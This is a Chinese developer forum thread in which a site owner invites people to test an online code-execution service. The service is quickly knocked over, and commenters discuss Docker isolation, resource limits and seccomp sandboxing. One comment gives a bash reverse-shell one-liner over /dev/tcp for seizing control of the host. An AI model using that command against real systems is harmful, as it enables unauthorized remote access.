v2 的高手们，帮忙测试下这个在线编译网站

在线编译执行，这里的人会玩，帮忙测试下稳定不。

http://compiler.jser.com/

gamexg

2016-04-01 17:04:36 +08:00

@dixyes 禁函数效果不好， sae php 都被乌云报过安全环境逃逸， docker 之类的系统级安全限制比较可靠些，内核 bug 才会出现问题。还可以实现限制 cpu 内存等资源。

ipeony

2016-04-01 17:04:43 +08:00

打不开了？江苏电信

dixyes

2016-04-01 17:05:20 +08:00

@wph95 撸成 pyc 给个链接拍黄片撸成 phar 啥的然而我萌讨论并卵

ykjsw

2016-04-01 17:11:27 +08:00

现在机器已经起不来了， docker 刚刚用，也没隔离好，感谢大家给我上了一课。

yvanhe

2016-04-01 17:24:44 +08:00

看到标题就知道会发生什么了:joy:

droiz

2016-04-01 17:38:06 +08:00

打不开啊，已经被玩坏了吗

davidx

2016-04-01 20:29:03 +08:00

我来晚了么...

twor2

2016-04-01 20:35:47 +08:00

测试圆满成功

SlipStupig

2016-04-01 22:09:24 +08:00

bash -i >& /dev/tcp/your ip/your port 0>&1 解决控制系统

techmoe

2016-04-01 22:39:11 +08:00

2333333

virusdefender

2016-04-01 22:40:34 +08:00

哈哈哈哈已经卡死了啊

快来用我的判题沙箱 https://github.com/QingdaoU/Judger

virusdefender

2016-04-01 22:43:02 +08:00

我这里还有整套的 OnlineJudge 解决方案 https://github.com/QingdaoU/OnlineJudge

同求测试 https://qduoj.com/problems/ 账号 v2ex(都是小写) 密码 123456

denghongcai

2016-04-01 22:51:59 +08:00

docker 里跑， LXC 把资源限制死，容器大小用 brtfs 策略限制或者直接用 devicemapper 做底层驱动

virusdefender

2016-04-01 23:08:34 +08:00

1 不该用 root 跑 docker

docker 好像必须 root 吧，你说的 docker 里面么？那个可以使用降权用户的。

2 未限制每个 docker 的资源

这个是的

3 程序对危险函数未做处理。

危险函数是过滤不完的，过滤系统调用最简单。

---

我没看到你的网站，能编译 C/C++么，有些代码可以卡死编译器的。

ykjsw

2016-04-01 23:11:57 +08:00

@virusdefender c\c++ python lua java swift 等，基本常见的都可以跑

不是 docker 守护近程，是执行的那个，可以用其他用户跑的，我是因为一个权限问题，偷懒，直接改成 root 跑了

3 嗯，确实不可能 disable 完，我看到有个用禁止 sys_call 的方法（好像这么叫），但不知道怎么弄。。。

virusdefender

2016-04-01 23:17:07 +08:00

@ykjsw 看我们的方案 https://github.com/QingdaoU/Judger

ykjsw

2016-04-01 23:22:43 +08:00

@virusdefender 好的

2016-04-01 23:40:38 +08:00

@ykjsw 禁用 syscall 是用 seccomp

xiaozi

2016-04-01 23:56:19 +08:00

http://tool.lu/coderunner

欢迎使用

livc